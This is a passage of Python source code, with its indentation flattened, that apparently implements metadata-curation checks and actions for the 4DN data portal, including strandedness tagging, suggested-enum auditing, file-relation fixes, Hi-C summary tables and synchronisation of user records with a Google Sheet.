check.full_output['problematic']['inconsistent_strandedness'] = problematic['inconsistent_strandedness']
if missing_consistent_tag:
check.full_output['to_patch']['strandedness_verified'] = missing_consistent_tag
check.summary = 'Some experiments are missing verified strandedness tag'
check.allow_action = True
check.description = 'Ready to patch verified strandedness tag'
else:
check.status = 'PASS'
check.summary = 'All good!'
return check
@action_function()
def patch_strandedness_consistency_info(connection, **kwargs):
"""Start rna_strandness runs by sending compiled input_json to run_workflow endpoint"""
action = ActionResult(connection, 'patch_strandedness_consistency_info')
check_res = action.get_associated_check_result(kwargs)
action_logs = {'patch_success': [], 'patch_failure': []}
total_patches = check_res['full_output']['to_patch']
for key, item in total_patches.items():
for i in item:
tags = {'tags': []}
meta = ff_utils.get_metadata(i, key=connection.ff_keys)
if meta.get('tags'):
tags['tags'] = [tg for tg in meta['tags']]
tags['tags'].append(key)
else:
tags = {'tags': [key]}
try:
ff_utils.patch_metadata(tags, i, key=connection.ff_keys)
except Exception as e:
action_logs['patch_failure'].append({i: str(e)})
else:
action_logs['patch_success'].append(i)
if action_logs['patch_failure']:
action.status = 'FAIL'
else:
action.status = 'DONE'
action.output = action_logs
return action
@check_function()
def check_suggested_enum_values(connection, **kwargs):
"""On our schemas we have have a list of suggested fields for
suggested_enum tagged fields. A value that is not listed in this list
can be accepted, and with this check we will find all values for
each suggested enum field that is not in this list.
There are 2 functions below:
- find_suggested_enum
This functions takes properties for a item type (taken from /profiles/)
and goes field by field, looks for suggested enum lists, and is also
recursive for taking care of sub-embedded objects (tagged as type=object).
Additionally, it also takes ignored enum lists (enums which are not
suggested, but are ignored in the subsequent search).
* after running this function, we construct a search url for each field,
where we exclude all values listed under suggested_enum (and ignored_enum)
from the search: i.e. if it was FileProcessed field 'my_field' with options
[val1, val2], url would be:
/search/?type=FileProcessed&my_field!=val1&my_field!=val2&my_field!=No value
- extract value
Once we have the search result for a field, we disect it
(again for subembbeded items or lists) to extract the field value, and =
count occurences of each new value. (i.e. val3:10, val4:15)
*deleted items are not considered by this check
"""
check = CheckResult(connection, 'check_suggested_enum_values')
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
# must set this to be the function name of the action
check.action = "add_suggested_enum_values"
def find_suggested_enum(properties, parent='', is_submember=False):
"""Filter schema propteries for fields with suggested enums.
This functions takes properties for a item type (taken from /profiles/)
and goes field by field, looks for suggested enum lists, and is also
recursive for taking care of sub-embedded objects (tagged as
type=object). It also looks fore ignored enum lists.
"""
def is_subobject(field):
if field.get('type') == 'object':
return True
try:
return field['items']['type'] == 'object'
except:
return False
def dotted_field_name(field_name, parent_name=None):
if parent_name:
return "%s.%s" % (parent_name, field_name)
else:
return field_name
def get_field_type(field):
field_type = field.get('type', '')
if field_type == 'string':
if field.get('linkTo', ''):
return "Item:" + field.get('linkTo')
# if multiple objects are linked by "anyOf"
if field.get('anyOf', ''):
links = list(filter(None, [d.get('linkTo', '') for d in field.get('anyOf')]))
if links:
return "Item:" + ' or '.join(links)
# if not object return string
return 'string'
elif field_type == 'array':
return 'array of ' + get_field_type(field.get('items'))
return field_type
fields = []
for name, props in properties.items():
options = []
# focus on suggested_enum ones
if 'suggested_enum' not in str(props):
continue
# skip calculated
if props.get('calculatedProperty'):
continue
is_array = False
if is_subobject(props) and name != 'attachment':
is_array = get_field_type(props).startswith('array')
obj_props = {}
if is_array:
obj_props = props['items']['properties']
else:
obj_props = props['properties']
fields.extend(find_suggested_enum(obj_props, name, is_array))
else:
field_name = dotted_field_name(name, parent)
field_type = get_field_type(props)
# check props here
if 'suggested_enum' in props:
options = props['suggested_enum']
if 'ignored_enum' in props:
options.extend(props['ignored_enum'])
# if array of string with enum
if is_submember or field_type.startswith('array'):
sub_props = props.get('items', '')
if 'suggested_enum' in sub_props:
options = sub_props['suggested_enum']
if 'ignored_enum' in sub_props:
options.extend(sub_props['ignored_enum'])
fields.append((field_name, options))
return(fields)
def extract_value(field_name, item, options=[]):
"""Given a json, find the values for a given field.
Once we have the search result for a field, we disect it
(again for subembbeded items or lists) to extract the field value(s)
"""
# let's exclude also empty new_values
options.append('')
new_vals = []
if '.' in field_name:
part1, part2 = field_name.split('.')
val1 = item.get(part1)
if isinstance(val1, list):
for an_item in val1:
if an_item.get(part2):
new_vals.append(an_item[part2])
else:
if val1.get(part2):
new_vals.append(val1[part2])
else:
val1 = item.get(field_name)
if val1:
if isinstance(val1, list):
new_vals.extend(val1)
else:
new_vals.append(val1)
# are these linkTo items
if new_vals:
if isinstance(new_vals[0], dict):
new_vals = [i['display_title'] for i in new_vals]
new_vals = [i for i in new_vals if i not in options]
return new_vals
outputs = []
# Get Schemas
schemas = ff_utils.get_metadata('/profiles/', key=connection.ff_keys)
sug_en_cases = {}
for an_item_type in schemas:
properties = schemas[an_item_type]['properties']
sug_en_fields = find_suggested_enum(properties)
if sug_en_fields:
sug_en_cases[an_item_type] = sug_en_fields
for item_type in sug_en_cases:
for i in sug_en_cases[item_type]:
extension = ""
field_name = i[0]
field_option = i[1]
# create queries - we might need multiple since there is a url length limit
# Experimental - limit seems to be between 5260-5340
# all queries are appended by filter for No value
character_limit = 2000
extensions = []
extension = ''
for case in field_option:
if len(extension) < character_limit:
extension += '&' + field_name + '!=' + case
else:
# time to finalize, add no value
extension += '&' + field_name + '!=' + 'No value'
extensions.append(extension)
# reset extension
extension = '&' + field_name + '!=' + case
# add the leftover extension - there should be always one
if extension:
extension += '&' + field_name + '!=' + 'No value'
extensions.append(extension)
# only return this field
f_ex = '&field=' + field_name
common_responses = []
for an_ext in extensions:
q = "/search/?type={it}{ex}{f_ex}".format(it=item_type, ex=an_ext, f_ex=f_ex)
responses = ff_utils.search_metadata(q, connection.ff_keys)
# if this is the first response, assign this as the first common response
if not common_responses:
common_responses = responses
# if it is the subsequent responses, filter the commons ones with the new requests (intersection)
else:
filter_ids = [i['@id'] for i in responses]
common_responses = [i for i in common_responses if i['@id'] in filter_ids]
# let's check if we depleted common_responses
if not common_responses:
break
odds = []
for response in common_responses:
odds.extend(extract_value(field_name, response, field_option))
if len(odds) > 0:
outputs.append(
{
'item_type': item_type,
'field': field_name,
'new_values': dict(Counter(odds))
})
if not outputs:
check.allow_action = False
check.brief_output = []
check.full_output = []
check.status = 'PASS'
check.summary = 'No new values for suggested enum fields'
check.description = 'No new values for suggested enum fields'
else:
b_out = []
for res in outputs:
b_out.append(res['item_type'] + ': ' + res['field'])
check.allow_action = False
check.brief_output = b_out
check.full_output = outputs
check.status = 'WARN'
check.summary = 'Suggested enum fields have new values'
check.description = 'Suggested enum fields have new values'
return check
@action_function()
def add_suggested_enum_values(connection, **kwargs):
"""No action is added yet, this is a placeholder for
automated pr that adds the new values."""
# TODO: for linkTo items, the current values are @ids, and might need a change
action = ActionResult(connection, 'add_suggested_enum_values')
action_logs = {}
# check_result = action.get_associated_check_result(kwargs)
action.status = 'DONE'
action.output = action_logs
return action
@check_function(days_back=30)
def check_external_references_uri(connection, **kwargs):
'''
Check if external_references.uri is missing while external_references.ref
is present.
'''
check = CheckResult(connection, 'check_external_references_uri')
days_back = kwargs.get('days_back')
from_date_query, from_text = wrangler_utils.last_modified_from(days_back)
search = ('search/?type=Item&external_references.ref%21=No+value' +
'&field=external_references' + from_date_query)
result = ff_utils.search_metadata(search, key=connection.ff_keys, is_generator=True)
items = []
for res in result:
bad_refs = [er.get('ref') for er in res.get('external_references', []) if not er.get('uri')]
if bad_refs:
items.append({'@id': res['@id'], 'refs': bad_refs})
names = [ref.split(':')[0] for item in items for ref in item['refs']]
name_counts = [{na: names.count(na)} for na in set(names)]
if items:
check.status = 'WARN'
check.summary = 'external_references.uri is missing'
check.description = '%s items %sare missing uri' % (len(items), from_text)
else:
check.status = 'PASS'
check.summary = 'All external_references uri are present'
check.description = 'All dbxrefs %sare formatted properly' % from_text
check.brief_output = name_counts
check.full_output = items
return check
@check_function(days_back=30)
def check_opf_lab_different_than_experiment(connection, **kwargs):
'''
Check if other processed files have lab (generating lab) that is different
than the lab of that generated the experiment. In this case, the
experimental lab needs to be added to the opf (contributing lab).
'''
check = CheckResult(connection, 'check_opf_lab_different_than_experiment')
check.action = 'add_contributing_lab_opf'
# check only recently modified files, to reduce the number of items
days_back = kwargs.get('days_back')
from_date_query, from_text = wrangler_utils.last_modified_from(days_back)
search = ('search/?type=FileProcessed' +
'&track_and_facet_info.experiment_bucket%21=No+value' +
'&track_and_facet_info.experiment_bucket%21=processed+file' +
'&field=experiment_sets&field=experiments' +
'&field=lab&field=contributing_labs' + from_date_query)
other_processed_files = ff_utils.search_metadata(search, key=connection.ff_keys)
output_opfs = {'to_patch': [], 'problematic': []}
exp_set_uuids_to_check = [] # Exp or ExpSet uuid list
for opf in other_processed_files:
if opf.get('experiments'):
exp_or_sets = opf['experiments']
elif opf.get('experiment_sets'):
exp_or_sets = opf['experiment_sets']
else: # this should not happen
output_opfs['problematic'].append({'@id': opf['@id']})
continue
opf['exp_set_uuids'] = [exp_or_set['uuid'] for exp_or_set in exp_or_sets]
exp_set_uuids_to_check.extend([uuid for uuid in opf['exp_set_uuids'] if uuid not in exp_set_uuids_to_check])
# get lab of Exp/ExpSet
result_exp_set = ff_utils.get_es_metadata(exp_set_uuids_to_check, sources=['uuid', 'properties.lab'], key=connection.ff_keys)
es_uuid_2_lab = {} # map Exp/Set uuid to Exp/Set lab
for es in result_exp_set:
es_uuid_2_lab[es['uuid']] = es['properties']['lab']
# evaluate contributing lab
for opf in other_processed_files:
if opf['@id'] in [opf_probl['@id'] for opf_probl in output_opfs['problematic']]:
# skip problematic files
continue
opf_exp_set_labs = list(set([es_uuid_2_lab[exp_set] for exp_set in opf['exp_set_uuids']]))
contr_labs = [lab['uuid'] for lab in opf.get('contributing_labs', [])]
# add labs of Exp/Set that are not lab or contr_labs of opf
labs_to_add = [es_lab for es_lab in opf_exp_set_labs if es_lab != opf['lab']['uuid'] and es_lab not in contr_labs]
if labs_to_add:
contr_labs.extend(labs_to_add)
output_opfs['to_patch'].append({
'@id': opf['@id'],
'contributing_labs': contr_labs,
'lab': opf['lab']['display_title']})
if output_opfs['to_patch'] or output_opfs['problematic']:
check.status = 'WARN'
check.summary = 'Supplementary files need attention'
check.description = '%s files %sneed patching' % (len(output_opfs['to_patch']), from_text)
if output_opfs['problematic']:
check.description += ' and %s files have problems with experiments or sets' % len(output_opfs['problematic'])
if output_opfs['to_patch']:
check.allow_action = True
else:
check.status = 'PASS'
check.summary = 'All supplementary files have correct contributing labs'
check.description = 'All files %sare good' % from_text
check.brief_output = {'to_patch': len(output_opfs['to_patch']), 'problematic': len(output_opfs['problematic'])}
check.full_output = output_opfs
return check
@action_function()
def add_contributing_lab_opf(connection, **kwargs):
'''
Add contributing lab (the experimental lab that owns the experiment/set) to
the other processed files (supplementary) analyzed by a different lab.
'''
action = ActionResult(connection, 'add_contributing_lab_opf')
check_res = action.get_associated_check_result(kwargs)
files_to_patch = check_res['full_output']['to_patch']
action_logs = {'patch_success': [], 'patch_failure': []}
for a_file in files_to_patch:
patch_body = {'contributing_labs': a_file['contributing_labs']}
try:
ff_utils.patch_metadata(patch_body, a_file['@id'], key=connection.ff_keys)
except Exception as e:
action_logs['patch_failure'].append({a_file['@id']: str(e)})
else:
action_logs['patch_success'].append(a_file['@id'])
if action_logs['patch_failure']:
action.status = 'FAIL'
else:
action.status = 'DONE'
action.output = action_logs
return action
@check_function()
def grouped_with_file_relation_consistency(connection, **kwargs):
''' Check if "grouped with" file relationships are reciprocal and complete.
While other types of file relationships are automatically updated on
the related file, "grouped with" ones need to be explicitly (manually)
patched on the related file. This check ensures that there are no
related files that lack the reciprocal relationship, or that lack some
of the group relationships (for groups larger than 2 files).
'''
check = CheckResult(connection, 'grouped_with_file_relation_consistency')
check.action = 'add_grouped_with_file_relation'
search = 'search/?type=File&related_files.relationship_type=grouped+with&field=related_files'
files = ff_utils.search_metadata(search, key=connection.ff_keys, is_generator=True)
file2all = {} # map all existing relations
file2grp = {} # map "group with" existing relations
for f in files:
for rel in f['related_files']:
rel_type = rel['relationship_type']
rel_file = rel['file']['@id']
file2all.setdefault(f['@id'], []).append(
{"relationship_type": rel_type, "file": rel_file})
if rel_type == "grouped with":
file2grp.setdefault(f['@id'], []).append(rel_file)
# list groups of related items
groups = []
newgroups = [set(rel).union({file}) for file, rel in file2grp.items()]
# Check if any pair of groups in the list has a common file (intersection).
# In that case, they are parts of the same group: merge them.
# Repeat until all groups are disjoint (not intersecting).
while len(groups) != len(newgroups):
groups, newgroups = newgroups, []
for a_group in groups:
for each_group in newgroups:
if not a_group.isdisjoint(each_group):
each_group.update(a_group)
break
else:
newgroups.append(a_group)
# find missing relations
missing = {}
for a_group in newgroups:
pairs = [(a, b) for a in a_group for b in a_group if a != b]
for (a_file, related) in pairs:
if related not in file2grp.get(a_file, []):
missing.setdefault(a_file, []).append(related)
if missing:
# add existing relations to patch related_files
to_patch = {}
for f, r in missing.items():
to_patch[f] = file2all.get(f, [])
to_patch[f].extend([{"relationship_type": "grouped with", "file": rel_f} for rel_f in r])
check.brief_output = missing
check.full_output = to_patch
check.status = 'WARN'
check.summary = 'File relationships are missing'
check.description = "{} files are missing 'grouped with' relationships".format(len(missing))
check.allow_action = True
check.action_message = ("DO NOT RUN if relations need to be removed! "
"This action will attempt to patch {} items by adding the missing 'grouped with' relations".format(len(to_patch)))
else:
check.status = 'PASS'
check.summary = check.description = "All 'grouped with' file relationships are consistent"
return check
@action_function()
def add_grouped_with_file_relation(connection, **kwargs):
action = ActionResult(connection, 'add_grouped_with_file_relation')
check_res = action.get_associated_check_result(kwargs)
files_to_patch = check_res['full_output']
action_logs = {'patch_success': [], 'patch_failure': []}
for a_file, related_list in files_to_patch.items():
patch_body = {"related_files": related_list}
try:
ff_utils.patch_metadata(patch_body, a_file, key=connection.ff_keys)
except Exception as e:
action_logs['patch_failure'].append({a_file: str(e)})
else:
action_logs['patch_success'].append(a_file)
if action_logs['patch_failure']:
action.status = 'FAIL'
else:
action.status = 'DONE'
action.output = action_logs
return action
@check_function(days_back=1)
def check_hic_summary_tables(connection, **kwargs):
''' Check for recently modified Hi-C Experiment Sets that are released.
If any result is found, update the summary tables.
'''
check = CheckResult(connection, 'check_hic_summary_tables')
check.action = 'patch_hic_summary_tables'
query = ('search/?type=ExperimentSetReplicate&status=released' +
'&experiments_in_set.experiment_type.assay_subclass_short=Hi-C')
# search if there is any new expset
from_date_query, from_text = wrangler_utils.last_modified_from(kwargs.get('days_back'))
new_sets = ff_utils.search_metadata(query + from_date_query + '&field=accession', key=connection.ff_keys)
if len(new_sets) == 0: # no update needed
check.status = 'PASS'
check.summary = check.description = "No update needed for Hi-C summary tables"
return check
else:
check.status = 'WARN'
check.summary = 'New Hi-C datasets found'
# collect ALL metadata to patch
expsets = ff_utils.search_metadata(query, key=connection.ff_keys)
def _add_set_to_row(row, expset, dsg):
''' Add ExpSet metadata to the table row for dsg'''
row.setdefault('Data Set', {'text': dsg})
row['Data Set'].setdefault('ds_list', set()).add(expset.get('dataset_label'))
row.setdefault('Study', set()).add(expset.get('study'))
row.setdefault('Class', set()).add(expset.get('study_group'))
row.setdefault('Project', set()).add(expset['award']['project'])
row.setdefault('Lab', set()).add(expset['lab']['display_title'])
exp_type = expset['experiments_in_set'][0]['experiment_type']['display_title']
row['Replicate Sets'] = row.get('Replicate Sets', dict())
row['Replicate Sets'][exp_type] = row['Replicate Sets'].get(exp_type, 0) + 1
biosample = expset['experiments_in_set'][0]['biosample']
row.setdefault('Species', set()).add(biosample['biosource'][0].get('individual', {}).get('organism', {}).get('name', 'unknown species'))
if biosample['biosource'][0].get('cell_line'):
biosource = biosample['biosource'][0]['cell_line']['display_title']
else:
biosource = biosample['biosource_summary']
row.setdefault('Biosources', set()).add(biosource)
journal_mapping = {
'Science (New York, N.Y.)': 'Science',
'Genome biology': 'Genome Biol',
'Nature biotechnology': 'Nat Biotechnol',
'Nature genetics': 'Nat Genet',
'Nature communications': 'Nat Commun',
'Proceedings of the National Academy of Sciences of the United States of America': 'PNAS',
'The Journal of biological chemistry': 'J Biol Chem',
'The EMBO journal': 'EMBO J',
'The Journal of cell biology': 'J Cell Biol',
'Nature cell biology': 'Nat Cell Biol',
'Molecular cell': 'Mol Cell'
}
pub = expset.get('produced_in_pub')
if pub:
publication = [
{'text': pub['short_attribution'], 'link': pub['@id']},
{'text': '(' + journal_mapping.get(pub['journal'], pub['journal']) + ')', 'link': pub['url']}]
previous_pubs = [i['text'] for i in row.get('Publication', []) if row.get('Publication')]
if publication[0]['text'] not in previous_pubs:
row.setdefault('Publication', []).extend(publication)
return row
def _row_cleanup(row):
'''Summarize various fields in row'''
(row['Study'],) = row['Study']
(row['Class'],) = row['Class']
dsg_link = '&'.join(["dataset_label=" + ds for ds in row['Data Set']['ds_list']])
dsg_link = "/browse/?" + dsg_link.replace("+", "%2B").replace("/", "%2F").replace(" ", "+")
row['Data Set']['link'] = dsg_link
row['Replicate Sets'] = "<br>".join(
[str(count) + " " + exp_type for exp_type, count in row['Replicate Sets'].items()])
return row
# build the table
table = {}
problematic = {}
for a_set in expsets:
# make sure dataset and study group are present
if (a_set.get('dataset_label') is None) or (a_set.get('study_group') is None):
problematic.setdefault('missing_info', []).append(a_set['@id'])
continue
# create/update row in the table
dsg = a_set.get('dataset_group', a_set['dataset_label'])
table[dsg] = _add_set_to_row(table.get(dsg, {}), a_set, dsg)
# consolidate the table
for dsg, row in table.items():
if (len(row['Study']) == 1) and (len(row['Class']) == 1):
table[dsg] = _row_cleanup(row)
else:
problematic.setdefault('multiple_info', []).append(dsg)
table.pop(dsg)
# split table into studygroup-specific output tables
output = {}
study_groups = list({row['Class'] for row in table.values()})
for st_grp in study_groups:
table_stg = {dsg: row for dsg, row in table.items() if row['Class'] == st_grp}
keys = ['Data Set', 'Project', 'Replicate Sets', 'Species', 'Biosources', 'Publication', 'Study', 'Lab']
if st_grp == "Single Time Point and Condition":
keys.remove('Study')
# make markdown table
name = "data-highlights.hic." + st_grp.lower().replace(" ", "-") + ".md"
default_col_widths = "[-1,100,-1,100,-1,-1,-1,-1]"
if "Study" not in keys:
default_col_widths = "[-1,100,-1,120,250,-1,170]"
output[st_grp] = {
'alias': "4dn-dcic-lab:" + name,
'body': wrangler_utils.md_table_maker(table_stg, keys, name, default_col_widths)}
check.description = "Hi-C summary tables need to be updated."
if problematic:
check.full_output = problematic
if problematic.get('missing_info'):
check.description += ' Dataset or study group are missing.'
if problematic.get('multiple_info'):
check.description += ' Multiple study or study groups found for the same dataset group.'
check.description += ' Will NOT patch until these problems are resolved. See full output for details.'
else:
check.brief_output = [s['accession'] for s in new_sets]
check.full_output = output
check.allow_action = True
check.action_message = 'Will attempt to patch {} static sections'.format(len(output))
return check
@action_function()
def patch_hic_summary_tables(connection, **kwargs):
''' Update the Hi-C summary tables
'''
action = ActionResult(connection, 'patch_hic_summary_tables')
check_res = action.get_associated_check_result(kwargs)
sections_to_patch = check_res['full_output']
action_logs = {'patch_success': [], 'patch_failure': []}
for item in sections_to_patch.values():
try:
ff_utils.patch_metadata({"body": item['body']}, item['alias'], key=connection.ff_keys)
except Exception as e:
action_logs['patch_failure'].append({item['alias']: str(e)})
else:
action_logs['patch_success'].append(item['alias'])
if action_logs['patch_failure']:
action.status = 'FAIL'
else:
action.status = 'DONE'
action.output = action_logs
return action
def get_oh_google_sheet():
# GET KEY FROM S3 To Access
# TODO: encrypt the key same as foursight key and use same function to fetch it
s3 = boto3.resource('s3')
obj = s3.Object('elasticbeanstalk-fourfront-webprod-system', 'DCICjupgoogle.json')
cont = obj.get()['Body'].read().decode()
key_dict = json.loads(cont)
SCOPES = 'https://www.googleapis.com/auth/spreadsheets'
creds = ServiceAccountCredentials.from_json_keyfile_dict(key_dict, SCOPES)
gc = gspread.authorize(creds)
# Get the google sheet information
book_id = '1zPfPjm1-QT8XdYtE2CSRA83KOhHfiRWX6rRl8E1ARSw'
sheet_name = 'AllMembers'
book = gc.open_by_key(book_id)
worksheet = book.worksheet(sheet_name)
return worksheet
@check_function()
def sync_users_oh_status(connection, **kwargs):
"""
Check users on database and OH google sheet, synchronize them
1) Pull all table values, All database users, labs and awards
2) If entry inactive in OH, remove user's permissions (lab, viewing_groups, submits_for, groups) from DCIC, mark inactive for DCIC
3) If user exist for OH and DCIC, check values on DCIC database, and update DCIC columns if anything is different from the table.
4) If only OH information is available on the table,
4.1) skip no email, and skip inactive
4.2) check if email exist already on the table, report problem
4.3) check if email exist on DCIC database, add DCIC information
4.4) if email is available, find the matching lab, and create new user, add user information to the table
4.5) if can not find the lab, report need for new lab creation.
5) check for users that are on dcic database, but not on the table, add as new DCIC users.
If a new user needs to be created, it will be first created on the portal, and second time
the check runs, it will be added to the excel (to prevent problems with un-synchronized actions)
"""
check = CheckResult(connection, 'sync_users_oh_status')
my_auth = connection.ff_keys
check.action = "sync_users_oh_start"
check.description = "Synchronize portal and OH user records"
check.brief_output = []
check.summary = ""
check.full_output = {}
check.status = 'PASS'
check.allow_action = False
def simple(string):
return string.lower().strip()
def generate_record(user, all_labs, all_grants):
"""Create excel data from the user info"""
a_record = {}
a_record['DCIC UUID'] = user['uuid']
a_record['DCIC Role'] = user.get('job_title', "")
a_record['DCIC First Name'] = user['first_name']
a_record['DCIC Last Name'] = user['last_name']
a_record['DCIC Account Email'] = user['email']
a_record['DCIC Contact Email'] = user.get('preferred_email', "")
# Role based award and labs
if a_record['DCIC Role'] == "External Scientific Adviser":
a_record['DCIC Lab'] = ''
a_record['DCIC Grant'] = 'External Science Advisor'
return a_record, []
if a_record['DCIC Role'] == "NIH Official":
a_record['DCIC Lab'] = ''
a_record['DCIC Grant'] = 'NIH PO Officers'
return a_record, []
# add lab name
# is the user is from response
user_lab = ''
try:
lab_name = user['lab']['display_title']
user_lab = [i for i in all_labs if i['display_title'] == lab_name][0]
except:
# is the user a new one (does not exist on data yet)
user_lab = [i for i in all_labs if i['@id'] == user['lab']][0]
lab_name = user_lab['display_title']
lab_converter = {'4DN DCIC, HMS': '<NAME>, HMS'}
if lab_name in lab_converter:
lab_name = lab_converter[lab_name]
a_record['DCIC Lab'] = lab_name
if lab_name == '<NAME>, HMS':
a_record['DCIC Grant'] = 'DCIC - Park (2U01CA200059-06)'
return a_record, []
# add award
user_awards = [i['uuid'] for i in user_lab['awards']]
user_awards = [i for i in all_grants if i['uuid'] in user_awards]
award_tags = []
for an_award in user_awards:
award_tag = ''
# find first 4dn grant
if an_award.get('viewing_group') in ['4DN', 'NOFIC']:
if an_award['display_title'] == 'Associate Member Award':
award_tag = 'Associate Member'
else:
tag = an_award['description'].split(':')[0]
try:
last = an_award['pi']['last_name']
except:
last = "no_PI"
award_tag = '{} - {} ({})'.format(tag, last, an_award['name'])
if award_tag == 'DCIC - DCIC (2U01CA200059-06)':
award_tag = 'DCIC - Park (2U01CA200059-06)'
if award_tag == 'DCIC - DCIC (1U01CA200059-01)':
award_tag = 'DCIC - Park (1U01CA200059-01)'
award_tags.append(award_tag)
try:
a_record['DCIC Grant'] = award_tags[0]
except:
a_record['DCIC Grant'] = 'Lab missing 4DN Award'
return a_record, award_tags
def compare_record(existing_record, user, all_labs, all_grants, new=False):
"""Check user response, and compare it to the exising record
only report the differences"""
updated_record, alt_awards = generate_record(user, all_labs, all_grants)
# if this is generated by OH records, find the referenced award
if new:
if existing_record.get('OH Grant'):
oh_grant = existing_record['OH Grant']
if oh_grant not in updated_record['DCIC Grant']:
upd_award = [i for i in alt_awards if oh_grant in i]
if upd_award:
updated_record['DCIC Grant'] = upd_award[0]
updates = {}
for a_key, a_val in updated_record.items():
if a_key == 'DCIC Grant':
if existing_record.get(a_key) in alt_awards:
continue
if existing_record.get(a_key) != a_val:
updates[a_key] = a_val
return updates
def find_lab(record, all_labs, all_grants):
lab = ''
all_lab_names = [i['display_title'] for i in all_labs]
score = 0
best = ''
log = []
# matcher = stringmatch.Levenshtein()
for disp in all_lab_names:
s = round(string_label_similarity(record['OH Lab'], disp.split(',')[0]) * 100)
if s > score:
best = disp
score = s
if score > 73:
lab = [i['@id'] for i in all_labs if i['display_title'] == best][0]
if not lab:
oh_grant = record.get('OH Grant')
if oh_grant:
grant = [i for i in all_grants if i['name'].endswith(oh_grant)]
else:
grant = []
if grant:
lab = grant[0].get('pi', {}).get('lab', {}).get('@id', '')
score = 100
log = ['Assigned via Award', oh_grant, grant[0]['name']]
return lab, score, log
def create_user_from_oh_info(a_record, all_labs, all_grants, credentials_only=False):
user_info = {}
user_info['viewing_groups'] = ["4DN"]
if not a_record.get('OH Account Email'):
return
if not credentials_only:
user_info['email'] = simple(a_record['OH Account Email'])
user_info['first_name'] = a_record['OH First Name']
user_info['last_name'] = a_record['OH Last Name']
user_info['job_title'] = a_record['OH Role']
if not user_info['job_title']:
user_info['job_title'] = 'Lab Associate'
# pre define a uuid so we can already put it on the excel
user_uuid = str(uuid.uuid4())
user_info['uuid'] = user_uuid
# predefined cases
if not a_record['OH Grant']:
if a_record['OH Role'] == "External Science Advisor" or a_record['OH Role'] == "External Program Consultant":
user_info['lab'] = '/labs/esa-lab/'
user_info['lab_score'] = 100
return user_info
if a_record['OH Role'] == "NIH Official":
user_info['lab'] = '/labs/nih-lab/'
user_info['lab_score'] = 100
return user_info
if a_record['OH Grant'] == "External Science Advisor" or a_record['OH Grant'] == "External Program Consultant":
user_info['lab'] = '/labs/esa-lab/'
user_info['lab_score'] = 100
return user_info
if a_record['OH Grant'] == "NIH Official":
user_info['lab'] = '/labs/nih-lab/'
user_info['lab_score'] = 100
return user_info
if a_record['OH Lab'] == '<NAME>':
# This would need to be reworked if members of Peter's lab are doing research
# It would need to be replaced by /labs/peter-park-lab/
user_info['lab'] = '/labs/4dn-dcic-lab/'
user_info['lab_score'] = 100
return user_info
# find lab, assign @id
user_info['lab'], lab_score, log = find_lab(a_record, all_labs, all_grants)
# Adding more information to the check to check by eye that the labs indeed correspond to OH labs
# It will be removed in the action to create the new user in the portal
user_info['lab_score'] = lab_score
user_info['OH_lab'] = a_record['OH Lab']
user_info['Log'] = log
return user_info
# get skipped users with the skip_oh_synchronization tag
# if you want to skip more users, append the tag to the user item
skip_users_meta = ff_utils.search_metadata('/search/?type=User&tags=skip_oh_synchronization', my_auth)
# skip bots, external devs and DCIC members
skip_users_uuid = [i['uuid'] for i in skip_users_meta]
skip_lab_display_title = ['<NAME>, HARVARD', 'DCIC Testing Lab', '4DN Viewing Lab']
# Collect information from data portal
all_labs = ff_utils.search_metadata('/search/?type=Lab', key=my_auth)
all_labs = [i for i in all_labs if i['display_title'] not in skip_lab_display_title]
all_grants = ff_utils.search_metadata('/search/?type=Award', key=my_auth)
all_users = ff_utils.search_metadata('/search/?status=current&status=deleted&type=User', key=my_auth)
# Get 4DN users
fdn_users_query = '/search/?type=User&viewing_groups=4DN&viewing_groups=NOFIC'
fdn_users_query += "".join(['&lab.display_title!=' + i for i in skip_lab_display_title])
fdn_users = ff_utils.search_metadata(fdn_users_query, key=my_auth)
# keep a tally of all actions that we need to perform
actions = {'delete_user': [],
'add_user': [],
'inactivate_excel': {},
'update_excel': {},
'patch_excel': {},
'add_excel': [],
'add_credentials': []
}
# keep track of all problems we encounter
problem = {'NEW OH Line for existing user': [], 'cannot find the lab': {}, 'double check lab': [], 'edge cases': [], 'audit checks': []}
# get oh google sheet
worksheet = get_oh_google_sheet()
table = worksheet.get_all_values()
# Convert table data into an ordered dictionary
df = pd.DataFrame(table[1:], columns=table[0])
user_list = df.to_dict(orient='records', into=OrderedDict)
# all dcic users in the list
all_dcic_uuids = [i['DCIC UUID'] for i in user_list if i.get('DCIC UUID')]
# Based on the excel which users should be deleted (remove credentials or inactivate)
# This will be used for some audit checks
excel_delete_users = [i['DCIC UUID'] for i in user_list if (i.get('DCIC UUID') and i['OH Active/Inactive'] == '0' and i['DCIC Active/Inactive'] != '0')]
# iterate over records and compare
for a_record in user_list:
if a_record.get('DCIC UUID'):
# skip if in skip users list
if a_record['DCIC UUID'] in skip_users_uuid:
continue
# skip if we inactivated it already
if a_record.get('DCIC Active/Inactive') == '0':
continue
# does it exist in our system with a lab
users = [i for i in fdn_users if i['uuid'] == a_record['DCIC UUID'].strip()]
if users:
user = users[0]
# is user inactivated on OH
if a_record.get('OH Active/Inactive') == '0':
# remove the user's permissions in the portal, and in the next round, inactivate it on the excel
actions['delete_user'].append(a_record['DCIC UUID'])
else:
# user exist on excel and on our database
# any new info?
updates = compare_record(a_record, user, all_labs, all_grants)
if updates.get('DCIC Grant', '') == 'Lab missing 4DN Award':
problem['edge cases'].append([updates['DCIC UUID'], 'Lab missing 4DN Award'])
continue
if updates:
actions['update_excel'][a_record['DCIC UUID']] = updates
# we deleted the user
else:
# This record should have been already deleted in the first round, set to innactive on excel
actions['inactivate_excel'][a_record['DCIC UUID']] = {'DCIC Active/Inactive': "0"}
# if we did not assign a uuid
else:
# did OH say inactive, then do nothing
if a_record.get('OH Active/Inactive') == '0':
continue
# does oh have an email, if not do nothing
if not a_record.get('OH Account Email'):
continue
# do we have OH email already
# we hit this point after creating new users on the portal (second time we run this check we add them to excel)
oh_mail = simple(a_record.get('OH Account Email', ""))
other_emails = simple(a_record.get('Other Emails', "")).split(',')
users_4dn = [i for i in fdn_users if (simple(i['email']) == oh_mail or i['email'] in other_emails)]
credentials_only = False # Whether create account from scratch or add credentials
if users_4dn:
# is this user already in the excel?
# oh created line for an existing user
user = users_4dn[0]
if user['uuid'] in all_dcic_uuids:
problem['NEW OH Line for existing user'].append([user['uuid'], oh_mail])
continue
updates = compare_record(a_record, user, all_labs, all_grants, new=True)
if updates.get('DCIC Grant', '') == 'Lab missing 4DN Award':
problem['edge cases'].append([updates['DCIC UUID'], 'Lab missing 4DN Award'])
continue
